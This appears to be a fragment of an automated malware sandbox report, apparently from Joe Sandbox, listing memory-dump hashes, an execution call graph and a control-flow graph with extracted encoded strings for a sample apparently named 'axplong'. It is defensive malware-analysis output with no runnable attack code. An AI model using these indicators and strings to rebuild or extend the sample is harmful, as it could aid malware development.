                                                                                                                                                                            • Opcode Fuzzy Hash: 1d07bda2a66ece35313eebb150993af79bae62713da46bef2475d9e0403d6d00
                                                                                                                                                                            • Instruction Fuzzy Hash: 4EF096B63CC111FEE109CB44A5809FA77B9F7D2720770946AF043CBD23F264AD85A620
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_4e10000_file.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 13275f29ae7b32ef8b2d90f2f559b5e01e9b55daadd3dfb43ce5d1abbeff573d
                                                                                                                                                                            • Instruction ID: 9b70b11bd3bbdb038f7b9b32995ada7efffe00b41387ea23318c5326c8734c9f
                                                                                                                                                                            • Opcode Fuzzy Hash: 13275f29ae7b32ef8b2d90f2f559b5e01e9b55daadd3dfb43ce5d1abbeff573d
                                                                                                                                                                            • Instruction Fuzzy Hash: 46F05CBB3CC144FDD00249906D846F23F2597965313702BA2E092C98D3E14124CFA131
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_4e10000_file.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2224a48864ebc5f0f69d8f787906cf5b31580b60a2b4d9dc909fac5c72552a03
                                                                                                                                                                            • Instruction ID: 616ab55339e4c6677fe34b68770c14ea87abbcb6d9668da8b916ea3aff49e4ea
                                                                                                                                                                            • Opcode Fuzzy Hash: 2224a48864ebc5f0f69d8f787906cf5b31580b60a2b4d9dc909fac5c72552a03
                                                                                                                                                                            • Instruction Fuzzy Hash: 6DF0A0BB2CC460ADA140C94125C46F9375AE7D1620370A85BE0079AA33F158ACCAB171
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_4e10000_file.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 551941b06f5ca16b613f9164defc562e4fa82d91cca001f3286992232456c2a5
                                                                                                                                                                            • Instruction ID: 6320de080a7aa9d8047e9a647114edbd4f1f3faf1d35a9011e098234824a73ec
                                                                                                                                                                            • Opcode Fuzzy Hash: 551941b06f5ca16b613f9164defc562e4fa82d91cca001f3286992232456c2a5
                                                                                                                                                                            • Instruction Fuzzy Hash: A4E02BFB3CC010EFF100864039942FA736AA7A0660770E866F443C7A63F2E469CAB031
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_4e10000_file.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: bfc635fb8be55883e3fb7ed89fb3afd0caf94f3540c0aca5699830752db49b06
                                                                                                                                                                            • Instruction ID: 5fefa90e31cf572cc9c36718a9f971906719d6e648d7f174bf8c7a268889976d
                                                                                                                                                                            • Opcode Fuzzy Hash: bfc635fb8be55883e3fb7ed89fb3afd0caf94f3540c0aca5699830752db49b06
                                                                                                                                                                            • Instruction Fuzzy Hash: 33E09BA35DC5E05EC6834D6090D12F53F929B5752031968C6C0958E937F01D28CBD5E2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_4e10000_file.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f94699a81c1180835f7c4d95df52b2a858b1d6439616fa3da3a63d530d1fac7d
                                                                                                                                                                            • Instruction ID: 968e52938142e048af9ec448690106c171c93a7c99a98ad4e1ec1d11298f7081
                                                                                                                                                                            • Opcode Fuzzy Hash: f94699a81c1180835f7c4d95df52b2a858b1d6439616fa3da3a63d530d1fac7d
                                                                                                                                                                            • Instruction Fuzzy Hash: AFE086BB2CC011BDA040958126845F5366EA3E1570370A857F003C9933F19499897071
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_4e10000_file.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 07c8ceac82fd935bfc6db1fa3e0990ff4c2027337d1db99aff626e4b21a8fe82
                                                                                                                                                                            • Instruction ID: 42900d9c4ce453c1809473115d7d12695cdb37a30a8bb0efb9ee600f287f721e
                                                                                                                                                                            • Opcode Fuzzy Hash: 07c8ceac82fd935bfc6db1fa3e0990ff4c2027337d1db99aff626e4b21a8fe82
                                                                                                                                                                            • Instruction Fuzzy Hash: C7D02EB628C001CEE290E9A130882B43721E790220B2458A7D083CA863D206508AB262
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_4e10000_file.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3699a904e52d61c0ddf61b89d70eb9c8452454d4d702be9a60e8fbd68a045cac
                                                                                                                                                                            • Instruction ID: a2c9d9b0d696584e1aa1a893360d7f26df000a79bd2551e9bc3358ec98fb8615
                                                                                                                                                                            • Opcode Fuzzy Hash: 3699a904e52d61c0ddf61b89d70eb9c8452454d4d702be9a60e8fbd68a045cac
                                                                                                                                                                            • Instruction Fuzzy Hash: 7DD0A73728C884CE7108D9457768EFA735AF3D7336330407BD006C5432D6A12AC9C960

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:14.2%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:1.7%
                                                                                                                                                                            Total number of Nodes:360
                                                                                                                                                                            Total number of Limit Nodes:27
                                                                                                                                                                            execution_graph 12319 c86559 12320 c863f7 __cftof 2 API calls 12319->12320 12321 c8656a 12320->12321 11964 c86beb 11965 c86bf7 __cftof 11964->11965 11976 c88aaf 11965->11976 11967 c86c26 11968 c86c43 11967->11968 11969 c86c35 11967->11969 11982 c868bd 11968->11982 11970 c86c99 2 API calls 11969->11970 11972 c86c3f 11970->11972 11973 c86c5d 11975 c86c71 __freea 11973->11975 11985 c86c99 11973->11985 11977 c88ab4 __cftof 11976->11977 11980 c88abf __cftof 11977->11980 11996 c8d4f4 11977->11996 11993 c8651d 11980->11993 11981 c88af2 __cftof __dosmaperr 11981->11967 12013 c8683a 11982->12013 11984 c868cf 11984->11973 11986 c86cc4 __cftof 11985->11986 11989 c86ca7 __cftof __dosmaperr 11985->11989 11987 c86d38 11986->11987 11988 c86d2a 11986->11988 11992 c86cea __cftof __dosmaperr 11986->11992 12053 c86d77 11987->12053 12049 c86e01 11988->12049 11989->11975 11992->11975 12001 c863f7 11993->12001 11997 c8d500 __cftof 11996->11997 11998 c8d55c __cftof __dosmaperr 11997->11998 11999 c8651d __cftof 2 API calls 11997->11999 11998->11980 12000 c8d6ee __cftof __dosmaperr 11999->12000 12000->11980 12002 c86405 __cftof 12001->12002 12003 c86450 12002->12003 12006 c8645b 12002->12006 12003->11981 12011 c8a1c2 GetPEB 12006->12011 12008 c86465 12009 c8646a GetPEB 12008->12009 12010 c8647a __cftof 12008->12010 12009->12010 12012 c8a1dc __cftof 12011->12012 12012->12008 12014 c86851 12013->12014 12015 c8685a 12013->12015 12014->11984 12015->12014 12019 c8b4bb 12015->12019 12020 c8b4ce 12019->12020 12022 c86890 12019->12022 12020->12022 12027 c8f46b 12020->12027 12023 c8b4e8 12022->12023 12024 c8b4fb 12023->12024 12025 c8b510 12023->12025 12024->12025 12032 c8e571 12024->12032 12025->12014 12028 c8f477 __cftof 12027->12028 12029 c8f4c6 12028->12029 12030 c88aaf __cftof 2 API calls 12028->12030 12029->12022 12031 c8f4eb 12030->12031 12033 c8e57b 12032->12033 12036 c8e489 12033->12036 12035 c8e581 12035->12025 12037 c8e495 __cftof __freea 12036->12037 12038 c88aaf __cftof 2 API calls 12037->12038 12039 c8e4b6 12037->12039 12040 c8e528 12038->12040 12039->12035 12041 c8e564 12040->12041 12045 c8a5ee 12040->12045 12041->12035 12046 c8a611 12045->12046 12047 c88aaf __cftof 2 API calls 12046->12047 12048 c8a687 12047->12048 12050 c86e28 __cftof 12049->12050 12052 c86e97 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z __dosmaperr 12050->12052 12058 c870c9 12050->12058 12052->11992 12054 c86d85 12053->12054 12055 c86d8a __dosmaperr 12054->12055 12056 c870c9 2 API calls 12054->12056 12055->11992 12057 c86da3 12056->12057 12057->11992 12059 c870df _wcsrchr 12058->12059 12067 c87156 12059->12067 12068 c8b9e4 12059->12068 12061 c87123 12062 c8b9e4 2 API calls 12061->12062 12061->12067 12063 c87134 12062->12063 12064 c8b9e4 2 API calls 12063->12064 12063->12067 12065 c87145 12064->12065 12066 c8b9e4 2 API calls 12065->12066 12065->12067 12066->12067 12067->12052 12070 c8b9f2 12068->12070 12072 c8b9f8 __cftof __dosmaperr 12070->12072 12073 c8ba2d 12070->12073 12071 c8ba28 12071->12061 12072->12061 12074 c8ba57 12073->12074 12077 c8ba3d __cftof __dosmaperr 12073->12077 12075 c8683a __cftof 2 API calls 12074->12075 12074->12077 12078 c8ba81 12075->12078 12076 c8b9a5 GetPEB GetPEB 12076->12078 12077->12071 12078->12076 12078->12077 12079 c5dfd0 12081 c5e01d 12079->12081 12080 c5e1c3 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 12081->12080 12084 c6c19a 12081->12084 12085 c6c1c2 12084->12085 12086 c6c1a4 12084->12086 12085->12085 12086->12085 12088 c6c1c7 12086->12088 12091 c52aa0 12088->12091 12090 c6c1de std::_Xinvalid_argument 12090->12086 12093 c52ab4 __cftof 12091->12093 12092 c52abf 12092->12090 12093->12092 12094 c88aaf __cftof 2 API calls 12093->12094 12095 c86c26 12094->12095 12096 c86c43 12095->12096 12097 c86c35 12095->12097 12099 c868bd 2 API calls 12096->12099 12098 c86c99 2 API calls 12097->12098 12100 c86c3f 12098->12100 12101 c86c5d 12099->12101 12100->12090 12102 c86c99 2 API calls 12101->12102 12103 c86c71 __freea 12101->12103 12102->12103 12103->12090 12284 c586b0 12285 c586b6 12284->12285 12286 c586d6 12285->12286 12287 c866e7 2 API calls 12285->12287 12288 c586d0 12287->12288 12387 c5e410 12388 c5e419 12387->12388 12390 c5e435 12387->12390 12388->12390 12391 c5e270 12388->12391 12392 c5e280 __dosmaperr 12391->12392 12393 c88979 2 API calls 12392->12393 12395 c5e2bd std::_Xinvalid_argument 12393->12395 12394 c5e270 2 API calls 12394->12395 12395->12394 12396 c5e435 12395->12396 12396->12388 12104 c66ae0 12106 c66b10 12104->12106 12107 c646c0 12106->12107 12115 c646fb shared_ptr __dosmaperr 12107->12115 12117 c64d80 shared_ptr 12107->12117 12108 c64e69 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z shared_ptr 12108->12106 12110 c64f25 shared_ptr 12111 c64fee shared_ptr 12110->12111 12113 c66ab6 12110->12113 12136 c57d00 12111->12136 12114 c646c0 2 API calls 12113->12114 12114->12113 12115->12117 12118 c64a0d shared_ptr 12115->12118 12140 c88979 12115->12140 12117->12108 12128 c565b0 12117->12128 12118->12117 12121 c642a0 12118->12121 12120 c64ffd __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z shared_ptr 12120->12106 12122 c642e2 12121->12122 12123 c64556 12122->12123 12126 c64308 shared_ptr 12122->12126 12124 c63550 2 API calls 12123->12124 12125 c64520 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z shared_ptr 12124->12125 12125->12117 12126->12125 12144 c63550 12126->12144 12129 c5660f 12128->12129 12130 c52280 2 API calls 12129->12130 12131 c56699 shared_ptr 12130->12131 12132 c52280 2 API calls 12131->12132 12133 c56822 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z shared_ptr 12131->12133 12134 c56727 shared_ptr 12132->12134 12133->12110 12134->12133 12135 c52280 2 API calls 12134->12135 12135->12134 12137 c57d66 shared_ptr __cftof 12136->12137 12139 c57eb8 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z shared_ptr 12137->12139 12233 c88a81 12137->12233 12139->12120 12141 c88994 12140->12141 12142 c886d7 2 API calls 12141->12142 12143 c8899e 12142->12143 12143->12118 12145 c6358f shared_ptr 12144->12145 12152 c63ab2 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z shared_ptr std::_Xinvalid_argument 12144->12152 12150 c638f5 shared_ptr __dosmaperr 12145->12150 12145->12152 12163 c5aca0 12145->12163 12146 c88979 2 API calls 12148 c63a8a 12146->12148 12149 c63e52 12148->12149 12148->12152 12153 c63b9d 12148->12153 12168 c62e20 12149->12168 12150->12146 12150->12152 12152->12126 12155 c61dd0 12153->12155 12157 c61e6b shared_ptr __dosmaperr 12155->12157 12156 c61e78 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z shared_ptr std::_Xinvalid_argument 12156->12152 12157->12156 12158 c88979 2 API calls 12157->12158 12160 c62265 shared_ptr 12158->12160 12160->12156 12179 c866e7 12160->12179 12161 c6268b shared_ptr __dosmaperr 12161->12156 12162 c88979 2 API calls 12161->12162 12162->12156 12165 c5adf0 __cftof 12163->12165 12164 c5ae16 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z shared_ptr 12164->12150 12165->12164 12206 c55500 12165->12206 12167 c5af7e 12170 c62ec5 shared_ptr __cftof 12168->12170 12169 c6351a __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z shared_ptr std::_Xinvalid_argument 12169->12152 12170->12169 12172 c5aca0 2 API calls 12170->12172 12175 c638f5 shared_ptr __dosmaperr 12170->12175 12171 c88979 2 API calls 12173 c63a8a 12171->12173 12172->12175 12173->12169 12174 c63e52 12173->12174 12177 c63b9d 12173->12177 12176 c62e20 2 API calls 12174->12176 12175->12169 12175->12171 12176->12169 12178 c61dd0 2 API calls 12177->12178 12178->12169 12180 c866f3 __cftof 12179->12180 12182 c866fd __cftof __dosmaperr 12180->12182 12183 c86670 12180->12183 12182->12161 12184 c86692 12183->12184 12186 c8667d __cftof __dosmaperr __freea 12183->12186 12184->12186 12187 c89ef9 12184->12187 12186->12182 12188 c89f11 12187->12188 12190 c89f36 12187->12190 12188->12190 12191 c902f8 12188->12191 12190->12186 12192 c90304 __cftof 12191->12192 12194 c9030c __cftof __dosmaperr 12192->12194 12195 c903ea 12192->12195 12194->12190 12196 c9040c 12195->12196 12198 c90410 __cftof __dosmaperr 12195->12198 12196->12198 12199 c8fb7f 12196->12199 12198->12194 12200 c8fbcc 12199->12200 12201 c8683a __cftof GetPEB GetPEB 12200->12201 12203 c8fbdb __cftof 12201->12203 12202 c8fe7b __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 12202->12198 12203->12202 12204 c8d2e9 GetPEB GetPEB 12203->12204 12205 c8c4ea GetPEB GetPEB __fassign 12203->12205 12204->12203 12205->12203 12207 c55520 12206->12207 12209 c55620 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 12207->12209 12210 c52280 12207->12210 12209->12167 12213 c52240 12210->12213 12214 c52256 12213->12214 12217 c88667 12214->12217 12220 c87456 12217->12220 12219 c52264 12219->12207 12221 c87496 12220->12221 12225 c8747e __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z __cftof __dosmaperr 12220->12225 12222 c8683a __cftof 2 API calls 12221->12222 12221->12225 12223 c874ae 12222->12223 12226 c87a11 12223->12226 12225->12219 12228 c87a22 12226->12228 12227 c87a31 __cftof __dosmaperr 12227->12225 12228->12227 12229 c87d83 GetPEB GetPEB 12228->12229 12230 c87fb5 GetPEB GetPEB 12228->12230 12231 c87c0f GetPEB GetPEB 12228->12231 12232 c87c35 GetPEB GetPEB 12228->12232 12229->12228 12230->12228 12231->12228 12232->12228 12236 c886d7 12233->12236 12235 c88a9f 12235->12139 12237 c886e9 12236->12237 12238 c8683a __cftof 2 API calls 12237->12238 12241 c886fe __cftof __dosmaperr 12237->12241 12240 c8872e 12238->12240 12240->12241 12242 c88925 12240->12242 12241->12235 12243 c88962 12242->12243 12244 c88932 12242->12244 12253 c8d2e9 12243->12253 12247 c88941 __fassign 12244->12247 12248 c8d30d 12244->12248 12247->12240 12249 c8683a __cftof 2 API calls 12248->12249 12250 c8d32a 12249->12250 12252 c8d33a __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 12250->12252 12257 c8f07f 12250->12257 12252->12247 12254 c8d2f4 12253->12254 12255 c8b4bb __cftof 2 API calls 12254->12255 12256 c8d304 12255->12256 12256->12247 12258 c8683a __cftof 2 API calls 12257->12258 12259 c8f09f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z __cftof __fassign __freea 12258->12259 12259->12252 12289 c6a140 12290 c6a1c0 12289->12290 12293 c67040 12290->12293 12292 c6a1fc shared_ptr 12295 c67081 __cftof __Mtx_init_in_situ 12293->12295 12294 c672b6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 12294->12292 12295->12294 12297 c52e80 12295->12297 12299 c52ec6 12297->12299 12303 c52f2f 12297->12303 12298 c52faf 12298->12294 12300 c6c19a 2 API calls 12299->12300 12302 c52edd __Mtx_unlock 12299->12302 12300->12302 12301 c6c19a 2 API calls 12301->12303 12302->12301 12302->12303 12303->12298 12304 c6c19a 2 API calls 12303->12304 12305 c52f80 __Mtx_unlock 12303->12305 12304->12305 12306 c6c19a 2 API calls 12305->12306 12307 c52f98 __Cnd_broadcast 12305->12307 12306->12307 12307->12298 12308 c6c19a 2 API calls 12307->12308 12309 c52ffc shared_ptr __Mtx_unlock 12308->12309 12310 c6c19a 2 API calls 12309->12310 12311 c5318b 12309->12311 12313 c53191 12309->12313 12315 c53153 __Mtx_unlock 12309->12315 12318 c53167 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 12309->12318 12310->12311 12312 c6c19a 2 API calls 12311->12312 12312->12313 12314 c6c19a 2 API calls 12313->12314 12314->12315 12316 c6c19a 2 API calls 12315->12316 12315->12318 12317 c5319d 12316->12317 12318->12294 12332 c68700 12333 c6875a __cftof 12332->12333 12339 c69ae0 12333->12339 12335 c68784 12338 c6879c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 12335->12338 12343 c543b0 12335->12343 12337 c68809 std::_Throw_future_error 12340 c69b15 12339->12340 12348 c52ca0 12340->12348 12342 c69b46 12342->12335 12344 c543ca 12343->12344 12345 c543d1 12344->12345 12346 c86beb 2 API calls 12344->12346 12345->12337 12347 c543e4 12346->12347 12349 c52cdd 12348->12349 12350 c52d11 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 12349->12350 12351 c52d48 12349->12351 12355 c6be27 12349->12355 12350->12342 12362 c52400 12351->12362 12356 c6be33 std::_Xinvalid_argument 12355->12356 12357 c6bea3 12356->12357 12358 c6be9a 12356->12358 12360 c52aa0 2 API calls 12357->12360 12365 c6bdaf 12358->12365 12361 c6be9f 12360->12361 12361->12351 12382 c6b506 12362->12382 12364 c52432 12366 c6bdc7 12365->12366 12367 c6bdce 12366->12367 12370 c86beb 12366->12370 12367->12361 12369 c6bdd7 12369->12361 12371 c86bf7 __cftof 12370->12371 12372 c88aaf __cftof 2 API calls 12371->12372 12373 c86c26 12372->12373 12374 c86c43 12373->12374 12375 c86c35 12373->12375 12377 c868bd 2 API calls 12374->12377 12376 c86c99 2 API calls 12375->12376 12378 c86c3f 12376->12378 12379 c86c5d 12377->12379 12378->12369 12380 c86c99 2 API calls 12379->12380 12381 c86c71 __freea 12379->12381 12380->12381 12381->12369 12383 c6b521 std::_Xinvalid_argument 12382->12383 12384 c88aaf __cftof 2 API calls 12383->12384 12386 c6b588 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z __cftof 12383->12386 12385 c6b5cf 12384->12385 12386->12364 12322 c6b85e 12323 c6b6e5 2 API calls 12322->12323 12324 c6b886 12323->12324 12325 c6b648 2 API calls 12324->12325 12326 c6b89f 12325->12326 12327 c86974 12328 c8698c 12327->12328 12329 c86982 12327->12329 12330 c868bd 2 API calls 12328->12330 12331 c869a6 __freea 12330->12331 12260 c6b7e9 12265 c6b6e5 12260->12265 12262 c6b811 Concurrency::details::_Reschedule_chore 12271 c6b648 12262->12271 12264 c6b84e 12267 c6b6f1 Concurrency::details::_Reschedule_chore 12265->12267 12266 c6b722 12266->12262 12267->12266 12279 c52ad0 12267->12279 12269 c6b70c __Mtx_unlock 12270 c52ad0 2 API calls 12269->12270 12270->12266 12273 c6b654 Concurrency::details::_Reschedule_chore 12271->12273 12272 c6b6ae 12272->12264 12273->12272 12274 c52ad0 2 API calls 12273->12274 12275 c6b66f __Mtx_unlock 12274->12275 12276 c52ad0 2 API calls 12275->12276 12277 c6b68c __Cnd_broadcast 12276->12277 12277->12272 12278 c52ad0 2 API calls 12277->12278 12278->12272 12280 c52adc 12279->12280 12281 c52ada 12279->12281 12282 c6c19a 2 API calls 12280->12282 12281->12269 12283 c52ae2 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z ___std_exception_copy 12282->12283 12283->12269

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1085 c5e440-c5e989 call c67870 call c55b20 call c67870 call c55b20 call c691b0 call c68250 call c68150 call c68250 call c67870 * 3 call c5bd60 call c67870 * 2 call c55b20 call c584b0 1130 c5e9b3-c5e9cd call c6cf21 1085->1130 1131 c5e98b-c5e997 1085->1131 1132 c5e9a9-c5e9b0 call c6d593 1131->1132 1133 c5e999-c5e9a7 1131->1133 1132->1130 1133->1132 1135 c5e9d3-c5ed89 call c86b9a call c67870 call c55b20 call c682f0 call c68150 call c67870 call c55b20 call c682f0 call c68150 1133->1135 1171 c5f183-c5f19b 1135->1171 1172 c5f4cb-c5f57c call c67f30 1135->1172 1173 c5f1a1-c5f1ad 1171->1173 1174 c5f5b3-c5f5c6 1171->1174 1172->1171 1177 c5f5a9-c5f5b0 call c6d593 1172->1177 1176 c5f1b3-c5f1c1 1173->1176 1173->1177 1176->1172 1179 c5f5db-c5f872 call c86b9a call c67870 call c55b20 call c67870 * 4 call c5e440 call c67f30 call c67870 call c67f30 * 2 1176->1179 1177->1174 1214 c5f874-c5f880 1179->1214 1215 c5f89c-c5f8b5 call c6cf21 1179->1215 1217 c5f892-c5f899 call c6d593 1214->1217 1218 c5f882-c5f890 1214->1218 1217->1215 1218->1217 1221 c5f8bb-c5fa25 call c86b9a call c67870 call c55b20 call c67870 * 4 call c5e440 1218->1221 1243 c5fa27-c5fa33 1221->1243 1244 c5fa4f-c5fa5e 1221->1244 1245 c5fa45-c5fa4c call c6d593 1243->1245 1246 c5fa35-c5fa43 1243->1246 1245->1244 1246->1245 1247 c5fa5f-c5fb7f call c86b9a call c67870 call c594b0 call c59160 call c68250 1246->1247 1262 c5fb80-c5fb85 1247->1262 1262->1262 1263 c5fb87-c60770 call c67f30 call c67870 * 2 call c5c280 call c86659 call c67870 call c55b20 call c67870 * 4 call c5e440 1262->1263 1297 c60772-c6077e 1263->1297 1298 c6079a-c607b5 call c6cf21 1263->1298 1299 c60790-c60797 call c6d593 1297->1299 1300 c60780-c6078e 1297->1300 1299->1298 1300->1299 1302 c607de-c611f4 call c86b9a call c67870 call c55b20 call c67870 * 4 call c5e440 1300->1302 1324 c611f9-c6149c 1302->1324
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
                                                                                                                                                                            • API String ID: 0-214772295
                                                                                                                                                                            • Opcode ID: 37f2e3f96269596ac6892ffa1675b052c7fc1a4e6d7ed0abe427930343359a54
                                                                                                                                                                            • Instruction ID: d102e220a91b2a3541e0fcf970e6c92187b8ec0fb6499f12010a8391ec472477
                                                                                                                                                                            • Opcode Fuzzy Hash: 37f2e3f96269596ac6892ffa1675b052c7fc1a4e6d7ed0abe427930343359a54
                                                                                                                                                                            • Instruction Fuzzy Hash: FB82F870904248DBEF28EF68C9897DE7FB5AF46304F504598E805273C2D7799A89CBD2

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
